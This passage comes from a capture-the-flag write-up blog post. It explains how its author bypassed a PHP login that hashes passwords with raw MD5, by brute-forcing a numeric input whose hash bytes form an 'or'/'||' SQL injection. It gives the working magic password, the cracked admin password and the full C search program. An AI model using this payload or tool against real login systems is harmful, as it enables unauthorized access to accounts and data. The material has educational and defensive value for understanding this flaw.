|| is equivalent to OR, and a string starting with a 1 is cast as an integer when used as a boolean. Therefore, my injection would be equivalent to this:

SELECT login FROM admins WHERE password = 'xxx' OR 1

By Just removing a single character, that got me down to 2.3 days' worth of calculation. Still not fast enough, but getting closer.

Lopping off another character, and more improvements

Since any number from 1 to 9 would work in my injection, I could shorten my injection string to just '||' and then check to see if the injection string were followed by a digit from 1 to 9 (a very cheap check). This would simultaneously reduce my MD5 calculations by a factor of 256 and make it 9 times as likely that I’d find a usable injection string.

And since || is the same as OR, I could check for it too (2x speedup) and all its case variations (16x speedup). Running my program on a remote dual-core desktop instead of my netbook got me another 10x speedup.

The final hash

After computing only 19 million MD5 hashes, my program found an answer:

content: 129581926211651571912466741651878684928
count:   18933549
hex:     06da5430449f8f6f23dfc1276f722738
raw:     ?T0D??o#??'or'8.N=?

So I submitted the password 129581926211651571912466741651878684928 to the PHP script, and it worked! I was able to see this table:

admins-table

Last step

The last step of the challenge was to turn the MD5 hash into a password. I could have used a brute forcer like John, but instead I just searched Google. The password had been cracked by opencrack.hashkiller.com and was 13376843.

The code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <openssl/evp.h>

// compile with: gcc -lssl find.c

int main(void) {

EVP_MD_CTX mdctx;
unsigned char md_value[EVP_MAX_MD_SIZE];
unsigned int md_len;
int i = 0;
int r, r1, r2, r3;
char rbuf[100];
char *match;

srand(time(0));

while(1) {
i++;
if(i % 100000 == 0) {
printf("i = %d\n", i);
}

// pick a random string made of digits
r = rand(); r1 = rand(); r2 = rand(); r3 = rand();
sprintf(rbuf, "%d%d%d%d", r, r1, r2, r3);

// calculate md5
EVP_DigestInit(&mdctx, EVP_md5());
EVP_DigestUpdate(&mdctx, rbuf, (size_t) strlen(rbuf));
EVP_DigestFinal_ex(&mdctx, md_value, &md_len);
EVP_MD_CTX_cleanup(&mdctx);

// find || or any case of OR
match = strstr(md_value, "'||'");
if(match == NULL) match = strcasestr(md_value, "'or'");

if(match != NULL && match[4] > '0' && match[4] <= '9') {
printf("content: %s\n", (char *)rbuf);
printf("count: %d\n", i);
printf("hex: ");
for(i = 0; i < md_len; i++)
printf("%02x", md_value[i]);
printf("\n");
printf("raw: %s\n", md_value);
exit(0);
}
}
}
view rawfind.cThis Gist brought to you by GitHub.

Final scoreboard

hax hax hax

Posted by k1rha